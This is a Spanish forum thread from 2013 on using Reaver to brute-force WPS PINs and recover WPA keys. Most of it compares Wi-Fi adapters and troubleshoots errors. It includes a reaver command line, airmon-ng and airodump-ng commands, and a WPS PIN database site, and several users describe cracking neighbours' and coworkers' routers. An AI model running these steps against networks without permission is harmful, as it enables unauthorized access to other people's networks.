tanto wifiway como wifislax soportan cualquier alfa que tenga rt8187l ó atheros....luego hay otra que trae el ralink 3070 y no sirve para ciertas cosas...eso sí,para navegar es tremenda....tengo unas cuantas y sí que puedo afirmarlo  ;)
las alfa y la edup llevan rt8187,la negra ralink 3070  la pequeña atheros....luego tengo algunas mas y bueno,prácticamente sólo sirven para navegar y punto.
(http://img195.imageshack.us/img195/5713/26012013492.jpg)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canariobreaker en 26 Enero 2013, 23:48 pm
bueno familia espero no equivocarme y lo que he voy a hacer es comprarme la alfa blanca 8188ru que veo que es compatible con reaver ya os contare un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 27 Enero 2013, 01:10 am
bueno familia espero no equivocarme y lo que he voy a hacer es comprarme la alfa blanca 8188ru que veo que es compatible con reaver ya os contare un saludo


hace ya mucho tiempo que el kernel les da buen soporte a las RU
EDITO: no es un soporte óptimo para auditoria wireless, me confundí con otras familia de realtek (SU, DE...), sorry.
Sigue los consejos de la gente que está más en en el área de las pruebas de campo, que se saben las cosas mejor de memoria :)
gracias orion por el aviso


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canariobreaker en 27 Enero 2013, 16:07 pm
muchas gracias por las contestaciones espero no equivocarme estaba indesiso entre la alfa blanca y la negra y por lo visto la blanca es mejor en el alcance y si encima va bien el reaver pues del 10 gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canariobreaker en 27 Enero 2013, 20:37 pm
hace ya mucho tiempo que el kernel les da buen soporte a las RU
EDITO: no es un soporte óptimo para auditoria wireless, me confundí con otras familia de realtek (SU, DE...), sorry.
Sigue los consejos de la gente que está más en en el área de las pruebas de campo, que se saben las cosas mejor de memoria :)
gracias orion por el aviso



ya me has echado para atras. la pregunta es la alfa blanca con 8188ru va bien para el reaver ¿? yo como ya he dicho lo que hago es arrancar un cd live con wifi slax 4.3 si no sirve decidmelo y me pllo la negra con chip atheros pero me gusta mas la blanca porque es ma potente. aconsejadme gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Enero 2013, 00:06 am
RT2573 [rt2573usb] (EDIMAX EW-7318USg) Funciona pero no trabaja con reaver.. siempre probara el mismo pin y nunca recibe ni manda los datos necesarios para poder verificar el PIN.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 28 Enero 2013, 00:40 am
RT2573 [rt2573usb] (EDIMAX EW-7318USg) Funciona pero no trabaja con reaver.. siempre probara el mismo pin y nunca recibe ni manda los datos necesarios para poder verificar el PIN.

Identico a mi RT3070, no asocia, y cuando asocia siempre me tira el mismo PIN. Para lo demas sirve, para reaver, es una porqueria :¬¬ .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 28 Enero 2013, 10:03 am

ya me has echado para atras. la pregunta es la alfa blanca con 8188ru va bien para el reaver ¿? yo como ya he dicho lo que hago es arrancar un cd live con wifi slax 4.3 si no sirve decidmelo y me pllo la negra con chip atheros pero me gusta mas la blanca porque es ma potente. aconsejadme gracias

Personalmente me quedaría con la que tiene chipset atheros....SIN DUDARLO xd....ese chip lo podrás usar casi CON CUALQUIER DISTRO...y recuerda que madwifi está diseñado específicamente para dar soporte a ath5 y ath9...o al menos eso creo.Algunos live cd traen la opción de usar uno u otro controlador,no estoy seguro si wifislax o wifiway,ya que tengo decenas de distros y no recuerdo todos los detalles...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 28 Enero 2013, 12:25 pm
RT2573 [rt2573usb] (EDIMAX EW-7318USg) Funciona pero no trabaja con reaver.. siempre probara el mismo pin y nunca recibe ni manda los datos necesarios para poder verificar el PIN.
Yo tengo esa y me va el reaver bien..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 28 Enero 2013, 22:41 pm
Yo tengo esa y me va el reaver bien..

Marca y modelo please. Quizás sea la marca qe es una mierd#  :-\ .

La mía es una aqprox 150mb ( appusb150da1106540 ) . RT3070,  no la hago arrancar ni a tiros ni en Wifislax ni ninguna distribución.

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 29 Enero 2013, 09:54 am
Marca y modelo please.

Pues la que había citado EDIMAX EW-7318USg


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 29 Enero 2013, 15:07 pm
Sorry, no me fijé :/. La mia no tira ni para atras. Pero bueno, en estos dias llegará dos nuevas, una RTL8188RU de 2w y una AR9271. Esta última se que no me fallará. Nunca me dio problemas con una TP-LINK con el mismo chip :)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 29 Enero 2013, 16:27 pm
probar lo siguiente con el chip ralink 3070

y mas despues de utilizar wicd

eliminar todos los interfaces en modo monitor y luego

ifconfig wlanX down
ifconfig wlanX up

y luego ya levantais un interface en modo monitor y ejecutais el reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Enero 2013, 01:15 am
Pues la que había citado EDIMAX EW-7318USg

(http://airodump.net/files/ew-7318-USg-complet.jpg)

Sorry, no me fijé :/. La mia no tira ni para atras. Pero bueno, en estos dias llegará dos nuevas, una RTL8188RU de 2w y una AR9271. Esta última se que no me fallará. Nunca me dio problemas con una TP-LINK con el mismo chip :)

La RTL8188RU olvídate.. yo no encontré todavía un driver que ponga el modo monitor perfectamente sin errores.. la AR9271 un cañon.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 30 Enero 2013, 01:36 am
probar lo siguiente con el chip ralink 3070

y mas despues de utilizar wicd

eliminar todos los interfaces en modo monitor y luego

ifconfig wlanX down
ifconfig wlanX up

y luego ya levantais un interface en modo monitor y ejecutais el reaver.

Mañana saco un rato y lo pruebo sin falta. Haber si lo hago funcionar :) . Gracias por el dato @warcry .

(http://airodump.net/files/ew-7318-USg-complet.jpg)

La RTL8188RU olvídate.. yo no encontré todavía un driver que ponga el modo monitor perfectamente sin errores.. la AR9271 un cañon.

Ums, cancelo el pedido pues.. Y a por el AR9271 de cabeza :), he tenido unas tres TP-LINK, y por causas de la vida.. una acabó quemada, otra rota y otra la regale con las soldaduras a medio quitar del puerto USB. Y ninguna sin ningun problema en reaver ni en ninguna otra cosa.
De verdad que da agusto con ese chip  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 1 Febrero 2013, 03:16 am
Hola chicos/as. Vereis, tengo un problemilla que no me había pasado antes, y qe me está volviendo. Dado que mi RT3070 va cuando le da la gana.. Pues coji a mi fiel AR9271, qe va como la seda. Me saca el PIN sin problemas, pero no me devuelve la WPA. Cosa qe en anteriores veces si me la ha devuelto :/. He probado con un par de AP y nada. ¿Sabéis de donde puede venir?, :(


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Febrero 2013, 04:08 am
Hola chicos/as. Vereis, tengo un problemilla que no me había pasado antes, y qe me está volviendo. Dado que mi RT3070 va cuando le da la gana.. Pues coji a mi fiel AR9271, qe va como la seda. Me saca el PIN sin problemas, pero no me devuelve la WPA. Cosa qe en anteriores veces si me la ha devuelto :/. He probado con un par de AP y nada. ¿Sabéis de donde puede venir?, :(

cambia la version de reaver o lanza el ataque con el PIN, hay veces que te tira un HASH de 64 caracteres y luego de lanzarlo nuevamente te tira los 8 o 10 que es la WPA.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 1 Febrero 2013, 10:27 am
Yo tengo esa y me va el reaver bien..
[La Edimax 7318USG]
EDITO: SOLUCIONADO, si es un león, me come.

Bueno a día de hoy puntualizo. Siempre había probado con wifislax 4.3 en modo live, ya fuese real o virtualizado con virtualbox, y de las dos formas me ha ido bastante bien. He instalado en HDD en virtualbox y me va bastante mal. Tengo que andar quitando y levantando la interfaz para que capture algo, el reaver lo mismo va bien media hora y deja de funcionar... Vuelvo a probar en live (real o via virtualbox) y va bien, no sé... ¡¡SE SUPONE QUE ES LO MISMO!! jejeje

Una dudilla, ¿puedo arrancando en modo live ver la instalación en HDD para guardar sesión? es que no consigo encontrarla :-\ (hablo en virtualbox, aunque debería ser igual que en real)

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Jose-basel en 2 Febrero 2013, 11:53 am
Hola buenas, vereis tengo una blueway con chipset rt2870/3070 , he estado intentando auditar algunas ap con wps (he comprobado que este configurado), y por lo que he estado leyendo se ha de haber bloqeado porqe ayer me tiraba el mensaje ese de reintentar en 60 s , pero hoy ya ni se asocia , es una orangeXXXX con mac 00:19:15 y las otras como la wlanxxxx con mac 00:19:15 se asocia pero siempre intenta el mismo pin supongo que no tiene ninguno asignado, y una vodafonexxxx con mac 6A:3D:FF, . A ver si me podeis echar una mano, gracias de antemano.

Errores: sending eapol start request
             Warning recieve timeout ocurred... Asi todo el rato

Otro error:switching mon0 to channel 1 ,2,3,4,5,6,7,8,9,10..... Etc


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: neburgo en 2 Febrero 2013, 12:34 pm
Buenos dias compañeros. Ya llevo utilizan reaver con los routers de mis compañeros y no hay ningun problema. Les saca las contraseñas a todos. He probado con WLAN_XXXX, ONOXXXX. Tambien he probado cambiandole el pin que viene por defecto, y tambien se lo traga. Pero me he encontrado con un problema en una red VodafoneXXXX mac 28:5f:db con reaver activado.
Es de un compañero del curro, y el modem lo tengo cerquita, al alcance de la mano, como los demas.
El problema que me pasa, esque se asocia bien, pero luego me tira continuamente mensajes de error  0x02, 0x03. e buscado y he probaco con esto:

 reaver -i ADAPTADORmonitor -b BBSID -a -c CANAL -e "ESSID" -d 5 -w -N -vv

Tambien he probado con las diferentes versiones de reaver y nada.
Sabeis si hay problemas con las esas redes vodafone, porque me acuerdo que al principio de salir me dio una vodafone, aunque con diferente MAC.
Un saludo y gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 2 Febrero 2013, 23:07 pm
neburgo : Pues atravete si eres capaz de sacar una clave de orange-xxxx wpa2 ccmp psk haber si eres capaz de sacarlas con esta lo vas tener superdificil a no ser que te sepas el pin correcto claro te lo digo por que estas sebloquean muy rapido me imagino que sera lo mismo que le pasa a la de vodafon en algunas. ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: neburgo en 3 Febrero 2013, 10:20 am
elsevi:  No, no se bloquea. No deja intentar ningun pin desde el principio. Me aparece el M1, M2 y despues se bloquea con un 0x02 o con un 0x03.
Las de orange, pffff, se bloquean enseguida y encima tardan en desbloquearse u monton.

Tambien probe con una de ONO, que se bloqueaba cada 20 pines, y se desbloqueaba a los 5 minutos justos. Una locura. Ahi como no tengas el pin correcto no hay nada que hacer, o gastar tiempo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 4 Febrero 2013, 01:13 am
@puntillero: /usr/local/etc/reaver con archivos MACADDRES.wpc

@Jose-basel: Especificarle mas datos a reaver, igual chipset poco compatible.

@VISILLO28: Te conectas con la WPA o con el PIN, pero depende mucho del router.

@neburgo: has intentado cambiar la versión de reaver? los errores 0x02, 0x03 y 0x04 pasan por chipset con poca compatibilidad, por ejemplo un RTL8188RU, RT3070, entre otros, que si funcionan pero olvídate de sacar algo, el problema principal viene desde los drivers, aparte también pueda que sea el router, que este tenga poca memoria, poco cache, por otro lado intenta cambiar la mac address por las dudas que el router tenga filtro de mac.

Errores:

Código:
[!] WPS transaction failed (code: 0x02), re-trying last pin

Código:
[!] WPS transaction failed (code: 0x03), re-trying last pin

Código:
[!] WPS transaction failed (code: 0x04), re-trying last pin



(http://i.minus.com/iCiM7kxT1dmR5.png)

WPSdb es un pequeño sitio que recauda información desinteresada sobre Pines de WPS, creando una Base de datos accesible para cualquier usuario, puedes realizar búsquedas según la MAC Address, adicionar pines, etc.

Algunas Imágenes:

(http://i.minus.com/iwtaEoda3P4jt.PNG)(http://i.minus.com/iUIdIbxPInF1F.PNG)
(http://i.minus.com/ibdCoEuytv0X92.PNG)(http://i.minus.com/ibqFw4aLScCns5.PNG)
(http://i.minus.com/iwPBZkSC0f5l8.PNG)(http://i.minus.com/idtuzO7pynQ4m.PNG)

VISITAR EL SITIO (http://wpsdb.site40.net/)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 4 Febrero 2013, 19:03 pm
tanto wifiway como wifislax soportan cualquier alfa que tenga rt8187l ó atheros....luego hay otra que trae el ralink 3070 y no sirve para ciertas cosas...eso sí,para navegar es tremenda....tengo unas cuantas y sí que puedo afirmarlo  ;)
las alfa y la edup llevan rt8187,la negra ralink 3070  la pequeña atheros....luego tengo algunas mas y bueno,prácticamente sólo sirven para navegar y punto.
(http://img195.imageshack.us/img195/5713/26012013492.jpg)

buenas,

tengo la alfa de abajo a la izquierda, y siempre me repite el mismo pin, el router lo tengo a 2 metros... señal 100x100, es q esa tarjeta no es compatible con reaver?

que me recomiendas que haga?

saldusos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 5 Febrero 2013, 01:17 am
@robeiniesta90: Por el color es la Alfa 2W, igual es media trucha porque no tiene la N  :silbar:



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 5 Febrero 2013, 18:23 pm
Acaba de terminar un chequeo en el que ha recorrido los 10000 primeros 4 dígitos y no ha encontrado nada... Reaver 1.4 de wifislax 4.3  :-\ ¿A qué puede ser debido? He pensado que al cortar con ctrl+c podría fallar en la petición en curso y darla por hecha, y al reiniciar sesión, seguir por la siguiente.... (ya sería casualidad 5 ó 6 sobre 10000  ;D) no sé... ¿Qué pensáis?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 5 Febrero 2013, 21:54 pm
Acaba de terminar un chequeo en el que ha recorrido los 10000 primeros 4 dígitos y no ha encontrado nada... Reaver 1.4 de wifislax 4.3  :-\ ¿A qué puede ser debido? He pensado que al cortar con ctrl+c podría fallar en la petición en curso y darla por hecha, y al reiniciar sesión, seguir por la siguiente.... (ya sería casualidad 5 ó 6 sobre 10000  ;D) no sé... ¿Qué pensáis?

Ya seria muy mala suerte tio :(. Aunque la duda ofende, si es cierto, dar en el clavo es dificil.. Pero ya te deja la intriga :S


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 5 Febrero 2013, 23:12 pm
Buenas gente, hoy he visto una nueva red de Orange-xxxx y me sorprende, porque tiene el wps activado, pero segun el wpscrackgui, no me detencta que tenga este activado, me sale desctivado, pero si lanzo los pines, Obtengo el M2 pero hay se queda y todo el rato con el (x03) que significa x03? y este router, llevo ya hora y cuarto con el mismo pin y parece ser que no se bloquea, que a los 10 intentos sigue intentando, aunque sale algun waring por cierto la mac es 84:9C:A6 creo que son las nuevas de orange-Livebox. salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 6 Febrero 2013, 01:55 am
adrihamel: Ese router de orange-xxxx se bloqueara y no podras avanzar nunca a no ser que pruebes con otro pin y tengas la suerte de que te de la clave cosa que veo dificil, tambien podrias probar con una antena alfa como las que han hablado los compañeros aqui una que sea buena y compatible con tu programa. saludos ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 6 Febrero 2013, 02:02 am
@puntillero seguro que llegaste a los 10.000, porque el diccionario normal trae 999 primeros 4 digitos.. XXXX.. tendrías que tenerlo ya en 99% colgado.

@adrihamel principalmente habría que ver el chipset, en si de esa mac no tengo ningún dato en particular así que debe de ser nueva.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 6 Febrero 2013, 09:29 am
@puntillero seguro que llegaste a los 10.000, porque el diccionario normal trae 999 primeros 4 digitos.. XXXX.. tendrías que tenerlo ya en 99% colgado.

@adrihamel principalmente habría que ver el chipset, en si de esa mac no tengo ningún dato en particular así que debe de ser nueva.

Con el reaver 1.4, llegó al pin 9998, que es el último de comprobación de los cuatro primeros, lo comprobaba sin resultados negativos y así seguía comprobándolo y volviéndolo a comprobar sin dar mensajes de error. Había recorrido 10000, no 999, a mí me empieza por varios pines comunes 1234, y otros, luego 1111, 2222, 3333... 9999, y ya empieza por 0001, 0002 hasta el 9998.

Esta noche he probado con el reaver 1.3, y al levantarme ponía "no se ha podido sacar la clave WPA" y en la siguiente línea "11000 intentos probados sin éxito" No me acuerdo de memoria y no lo he capturado, pero algo así en inglés. El 11000 era un once mil  ;D Para mí que no los ha probado todos, pero el primer número del fichero de sesión, que guarda por donde va, también decía eso.... rrraaro rrraro

Es un netgear 2C:B0:5D de ONO, recién contratado. He probado pines por defecto y no ha funcionado ninguno. El 5482 es el más común....

Gracias a los dos  :)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 6 Febrero 2013, 10:28 am
robeiniesta90...la antena alfa de abajo a la izqda es la awuso36h....la compré hace años(4 ó 5),cuando por aquí ni se veían....y costaban 50 euros.
Ahora valen 20....ignoro si llevarán los mismos chipset...sólo sé que esa antena concretamente funciona con TODO...
La que pone alfa 1 ,es la luxury....igual de efectiva que la anterior....la edup se supone que es más poderosa...pero va a ser que no...las tres llevan rt8187(copando cualquiera de sus variables)..más que suficiente para cubrir el stándar a/b/g
Para el n tengo la blanca,que calza chipset atheros...más que probada la eficacia de este chip tanto en inyección,modo monitor o-lo-que-quieras-echarle...no me he hecho con alguna más poderosa porque,entre otras cosas,no la necesito...tampoco vivo en medio del monte :xD
Hablo desde mi experiencia particular...por supuesto que también me encuentro con los mismos problemas que vosotros...un día le puedo meter caña a x router y otro ni se inmuta....por eso dispongo de varias antenas...una vez que TODAS me tiran el mismo fallo,entonces PUEDO hablar de si funciona o no con reaver...porque nadie puede explicar por qué ahora sí y luego no...o por qué me marca que está en mon0 y luego no reconoce la interfaz....en fin,los mismos problemas que todos.
Tampoco puedo probar sobre routers nuevos porque no los pillo...cualquiera que esté sobre 65% en pw,ni me molesto en darles caña....y las que están por debajo de ese rango ya las he juakeado casi todas....salvo las de orange....pero no sólo de reaver vive el hombre.

Y por supuesto,probar en varios OS es fundamental...lo que funciona con vmware igual no rula igual con virtualbox,o viceversa...y bla,bla,bla....
Resumiendo:probar,probar y probar.Cuando te canses de probar,pues sigues probando.Es lo que hay.
(http://img594.imageshack.us/img594/3762/file0394.jpg)
Salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: trakatranka en 6 Febrero 2013, 12:22 pm
mae mía llevo como 2 días sacando dos wpa con wps activado y le queda otra media vida como este la contraseña en el 999,  y eso que saque unas wpa la semana pasada sin problemas, estas las saco en unas 10h o así. utilizo reaver-wifislax 1.4 la beta 5, esto en en vmware y con wifislax 4.1 y me va bastante bien, el otro es un portatil pero le he cargado el wifislax desde el cd. un poco mas adelante en que saque estas pondré las cuatro en el foro correspondiente. son de mis vecinos y están avisados de peligros inminentes. utilizo una tp-link de 3db y alta ganancia


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Febrero 2013, 03:13 am
robeiniesta90...la antena alfa de abajo a la izqda es la awuso36h....la compré hace años(4 ó 5),cuando por aquí ni se veían....y costaban 50 euros.

yo la tengo desde el 2007 y viene con el (1).. osea la de arriba.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 7 Febrero 2013, 09:21 am
Buenas:

Por favor, no liemos el tema... aqui únicamente publicamos REAVER  :silbar:

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 7 Febrero 2013, 13:19 pm
Insisto un poco ;D ¿A nadie le ha pasado que recorra los cuatro primeros dígitos sin encontrarlos? He dado otra vuelta con otro adaptador, y tampoco lo ha encontrado...

(http://i.minus.com/iipgDPM07qRm8.png)
(http://imageshack.us/photo/my-images/33/dibujoszk.png)

Lo mismo el router repele el ataque de forma oculta. Como que cuando detecte ataque responda de forma negativa a todos los pines preguntados..

Me tiene intrigado..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Febrero 2013, 19:23 pm
yo la tengo desde el 2007 y viene con el (1).. osea la de arriba.

Es la de 500mW, no es la alfa 1W

Como que cuando detecte ataque responda de forma negativa a todos los pines preguntados..

si seria así no podrías conectarte normalmente por WPS.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 7 Febrero 2013, 19:26 pm
una pista.

la nueva moda en contramedidas de seguridad es dar falsos negativos tras detectar un intento de ataque por fuerza bruta. muy al estilo de microsoft con su popular hotmail.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Febrero 2013, 20:02 pm
tomando en cuenta eso, teniendo un router ya bloqueado es imposible conectarse con el pin REAL desde ese equipo (por ejemplo Alfa 1W) con el cual realizamos el ataque e igual con por ejemplo un equipo TP-Link que nunca vio la RED. Desbloqueado cualquiera de los dos se conectan, pero a la hora de estar bloqueado ninguno se puede conectar, por ende la medida de seguridad de bloquear la entrada de pin perjudica más al usuario que quizas lo utilice y al mismo atacante.. al atacante? ajja  :laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 7 Febrero 2013, 20:18 pm
tomando en cuenta eso, teniendo un router ya bloqueado es imposible conectarse con el pin REAL desde ese equipo (por ejemplo Alfa 1W) con el cual realizamos el ataque e igual con por ejemplo un equipo TP-Link que nunca vio la RED. Desbloqueado cualquiera de los dos se conectan, pero a la hora de estar bloqueado ninguno se puede conectar, por ende la medida de seguridad de bloquear la entrada de pin perjudica más al usuario que quizas lo utilice y al mismo atacante.. al atacante? ajja  :laugh:

atacao estoy yo con lo que estoy leyendo por aqui!

no puede ser que estemos yendo para atrás en este tema. las vulnerabilidades del WPS tienen que tender a su desaparicion cuanto antes.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 7 Febrero 2013, 21:40 pm
una pista.

la nueva moda en contramedidas de seguridad es dar falsos negativos tras detectar un intento de ataque por fuerza bruta. muy al estilo de microsoft con su popular hotmail.

Exacto, por ejemplo en algún que otro router de Orange.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 7 Febrero 2013, 22:00 pm
Exacto, por ejemplo en algún que otro router de Orange.

de hecho, si yo fuera colaborador del desarrollo de los firmwares de los aparatos de orange, sin duda alguna es el método que utilizaria para desorientar a los script-kiddies :D

y por lo visto funciona ehemmm! xDDD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 8 Febrero 2013, 00:03 am
Es la de 500mW, no es la alfa 1W

La que pone (1) es la alfa luxury....calza 1,8 W.... pero no es más efectiva con reaver que cualquiera de las otras...es más,diría que es demasiado potente :laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 8 Febrero 2013, 04:02 am
La que pone (1) es la alfa luxury....calza 1,8 W.... pero no es más efectiva con reaver que cualquiera de las otras...es más,diría que es demasiado potente :laugh:

No hay alfa de 1,8W jaja te vieron el pelo (Como la TP-Link de 1W que es de 500mW), la luxury ni siquiera es una edición original provista por alfa. La que no tiene nada es la Alfa 500mW y la que tiene el (1) es de 1W:

(http://i.minus.com/iVhCdHKyzRTNj.JPG)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 8 Febrero 2013, 10:41 am
tienes razón...es de 1 mW...me lié con la EDUP que sí los tiene...en cualquier caso tiene el mismo chipset,bueno para reaver y auditorías en general....independientemente de si es luxury,awuso ó variables.
Pero como ya digo,la de 500 mW me ha salido perfecta...años y años de duras pruebas y sigue impasible...

(http://imageshack.us/a/img16/8939/08022013505.jpg)
(http://imageshack.us/a/img820/3305/08022013504.jpg)
  ;-) ;-) me vieron el pelo...qué bueno


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 8 Febrero 2013, 13:29 pm
si seria así no podrías conectarte normalmente por WPS.

una pista.
la nueva moda en contramedidas de seguridad es dar falsos negativos tras detectar un intento de ataque por fuerza bruta. muy al estilo de microsoft con su popular hotmail.

Pues después de hacer un tercer barrido con una tarjeta distinta, en este caso la propia ipw3945 interna del portátil en modo live real, que por cierto va bastante bien, llego a la conclusión de que o el router lanza falsos negativos o el router ya tiene corregido el bug de la comprobación de los 4 primeros dígitos.

He guardado la auditoría en fichero de salida con la opcioón -o, y he analizado concienzudamente, con el excel y filtros, el fichero entregado. Todos los pines son comprobados en el mismo orden del diccionario que se genera, y cada vez que se produce un "failed" se repite la comprobación sin falta hasta que el router dice que no es el pin. Es una perogrullada, pero viendo que no se encontraba nada, había que comprobarlo.

Me llama también la atención que el tiempo de respuesta medio por pin sea de 2.58 segundos. No sé, me parece poco, no lo había visto antes y me da a que responde "sin pensárselo mucho"  :silbar:

Y a eso voy, lo de los falsos negativos no es ninguna tontería. Yo también, como el compañero alist3r, lo haría así. Por ejemplo, ¿fallas 10 veces? pues ahora te digo que no hasta que no reciba comprobaciones durante 10 minutos o hasta que me reinicies... ¿Empiezas de nuevo y fallas 3? Vuelta a decirte que no a todo, aunque el pin sea el correcto. Desde luego, el dueño legítimo no podrá entrar y se le ocurrirá algo como reiniciarlo e introducirlo con cuidado de no equivocarse... Mientras el atacante no sabe lo que está pasando porque no recibe ninguna "respuesta de enfado", por lo que tendrá crudo sacar nada.

El que quiera el fichero...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 8 Febrero 2013, 23:06 pm
lo de los dos segundo/pin es porque utilizas el reaver tuneado de wifislax 4.3, tienes el reaver 1.4 original y el 1.3 para probar, pero supongo que el resultado sera el mismo aunque tarde 4 segundos/pin que era lo que tardaba el reaver 1.4 sin modificar


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alister en 9 Febrero 2013, 03:29 am
llego a la conclusión de que o el router lanza falsos negativos o el router ya tiene corregido el bug de la comprobación de los 4 primeros dígitos.
...
Y a eso voy, lo de los falsos negativos no es ninguna tontería. Yo también, como el compañero alist3r, lo haría así.
haces bien en en tener esa hipotesis acerca de ese aparato.
y más que te vas a encontrar con el paso del tiempo.
prácticamente cualquer hacker ético que trabaje en contramedidas y sea un poco creativo lo haría asi...
que yo critico mucho a microsoft, pero para una cosa que hacen bien y que ha creado escuela... ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lorzas90 en 13 Febrero 2013, 18:08 pm
sigo los pasos perfectamente igual que en tu tutorial mi chipset es Intel 3945ABG realizo todo perfecto pero en el paso de la comprobacion del wps abro el archivo cap y no me salen todas los archivos con la opcion broadcast y en la otra columna que pone soucer no me sale bien los digitos que habia puesto del bssid y segudiamente busco la opcion microsoft WPS y no me aparece pa comprobar que este en 0x02.. esta operacion la e realiozado veinte veces tanto en mi portatil y en el pc grande y siempre tengo el mismo problema en ambos y probando distintas redes. Sabeis el porque me ocurre esto?? y luego paso a la opcion del ponerme a buscar las contraseñas y me sale este error --- WARNING: Failed to associate with XX:XX:XX:XX:XX:XX.. puedes ayudarme mediante mensajes o tienes skipe o algo para ponernos en contacto?? Espero tu respuestas gracias un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lorzas90 en 13 Febrero 2013, 18:10 pm
si pudiese ayudarme alguien mediante un chat correo o skipe lo agradeceria un saludo. espero ayuda gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Febrero 2013, 02:10 am
Usa Wash (Walsh) o Wifite  :¬¬


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 14 Febrero 2013, 11:17 am
sigo los pasos perfectamente igual que en tu tutorial mi chipset es Intel 3945ABG realizo todo perfecto pero en el paso de la comprobacion del wps abro el archivo cap y no me salen todas los archivos con la opcion broadcast y en la otra columna que pone soucer no me sale bien los digitos que habia puesto del bssid y segudiamente busco la opcion microsoft WPS y no me aparece pa comprobar que este en 0x02.. esta operacion la e realiozado veinte veces tanto en mi portatil y en el pc grande y siempre tengo el mismo problema en ambos y probando distintas redes. Sabeis el porque me ocurre esto?? y luego paso a la opcion del ponerme a buscar las contraseñas y me sale este error --- WARNING: Failed to associate with XX:XX:XX:XX:XX:XX.. puedes ayudarme mediante mensajes o tienes skipe o algo para ponernos en contacto?? Espero tu respuestas gracias un saludo.

Chico, pon un poco de empeño en expresar lo que quieres transmitir, que el mensaje (igual al privado que me has enviado) no hay por donde cogerlo
Citar
en el paso de la comprobacion del wps abro el archivo cap y no me salen todas los archivos con la opcion broadcast y en la otra columna que pone soucer no me sale bien los digitos que habia puesto del bssid y segudiamente busco la opcion microsoft WPS y no me aparece pa comprobar que este en 0x02
  :-\

¿Qué quieres hacer? ¿qué comandos usas? ¿qué errores te da?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lorzas90 en 14 Febrero 2013, 14:36 pm
migracias por atenderme haber te explicotano nusando wifi way 3.5 y wifislax realizo la siguiente operacion pongo modo monitor poniendo

airmon-ng start wlan0

Seguidamente:

airodumpo- ng mon0

